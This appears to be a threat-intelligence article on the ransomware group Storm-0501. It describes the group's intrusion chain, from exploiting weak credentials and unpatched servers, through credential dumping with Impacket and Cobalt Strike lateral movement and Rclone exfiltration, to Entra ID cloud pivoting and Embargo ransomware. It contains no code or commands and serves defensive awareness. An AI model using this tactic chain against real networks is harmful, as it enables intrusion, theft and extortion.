Storm-0501 Threat Actor
The cybercriminal group known as Storm-0501 has specifically focused on sectors such as government, manufacturing, transportation, and law enforcement within the United States to execute their ransomware attacks. Their multi-stage campaign aims to infiltrate hybrid cloud environments, facilitating lateral movement from on-premises systems to cloud infrastructures. This strategy ultimately leads to various malicious outcomes, including data exfiltration, credential theft, tampering, persistent backdoor access and the deployment of ransomware.
Table of Contents
The Evolution of Storm-0501
Storm-0501 operates with financial motivations at the core of its activities, utilizing both commercial and open-source tools to carry out its ransomware operations. Active since 2021, this group initially targeted educational institutions using the Sabbath (54bb47h) Ransomware. Over time, they have transitioned into a Ransomware-as-a-Service (RaaS) model, providing a range of ransomware payloads. Their repertoire now includes various notorious strains such as Hive, BlackCat (ALPHV), Hunters International, LockBit, and the Embargo Ransomware.
Initial Attack Vectors Utilized by Storm-0501
One significant characteristic of Storm-0501's operations is their exploitation of weak credentials and over-privileged accounts, which enables them to transition from an organization's on-premises systems to cloud infrastructures seamlessly.
Additionally, they employ various initial access methods, such as leveraging footholds established by access brokers like Storm-0249 and Storm-0900. They also target unpatched internet-facing servers, exploiting known remote code execution vulnerabilities in platforms like Zoho ManageEngine, Citrix NetScaler and Adobe ColdFusion 2016.
By utilizing any of these methods, Storm-0501 gains the opportunity to conduct extensive reconnaissance, allowing them to identify high-value assets, collect domain information, and perform Active Directory investigations. This phase is typically followed by the installation of remote monitoring and management tools (RMMs) to ensure ongoing access and persistence.
Exploitation of Privileges by Storm-0501
The threat actor capitalized on administrative privileges obtained from compromised local devices during the initial access phase, attempting to expand their reach within the network through various methods. Primarily, they employed Impacket's SecretsDump module, which facilitates the extraction of credentials over the network, leveraging it across a wide array of devices to gather valuable login information.
Once they acquired these compromised credentials, the threat actor used them to infiltrate additional devices and extract more credentials. During this process, they accessed sensitive files to retrieve KeePass secrets and executed brute-force attacks to obtain credentials for targeted accounts.
Lateral Movement and Data Exfiltration
Researchers have observed Storm-0501 utilizing Cobalt Strike for lateral movement within the network, employing the stolen credentials to execute follow-on commands. For data exfiltration from the on-premises environment, they utilized Rclone to transfer sensitive data to the MegaSync public cloud storage service.
Furthermore, the threat actor has been noted for establishing persistent backdoor access to cloud environments and deploying ransomware on on-premises systems. This marks them as the latest threat actor to focus on hybrid cloud setups, following in the footsteps of groups like Octo Tempest and Manatee Tempest.
Targeting the Cloud
The threat actor leveraged harvested credentials, particularly those from Microsoft Entra ID (formerly Azure AD), to facilitate lateral movement from on-premises systems to cloud environments, establishing a persistent backdoor for ongoing access to the target network.
This transition to the cloud is typically achieved either through a compromised Microsoft Entra Connect Sync user account or by hijacking the session of an on-premises user account that possesses an admin account in the cloud, particularly if multi-factor authentication (MFA) is disabled.
Deployment of the Embargo Ransomware
The attack culminates in the deployment of Embargo ransomware throughout the victim organization once the threat actor has secured sufficient control over the network and successfully exfiltrated files of interest. Embargo, a Rust-based ransomware variant, was first identified in May 2024.
Operating under a Ransomware-as-a-Service (RaaS) model, the group behind Embargo permits affiliates like Storm-0501 to utilize its platform for launching attacks in exchange for a percentage of the ransom. Embargo affiliates employ double extortion tactics, encrypting a victim's files while simultaneously threatening to release sensitive harvested data unless the ransom is paid.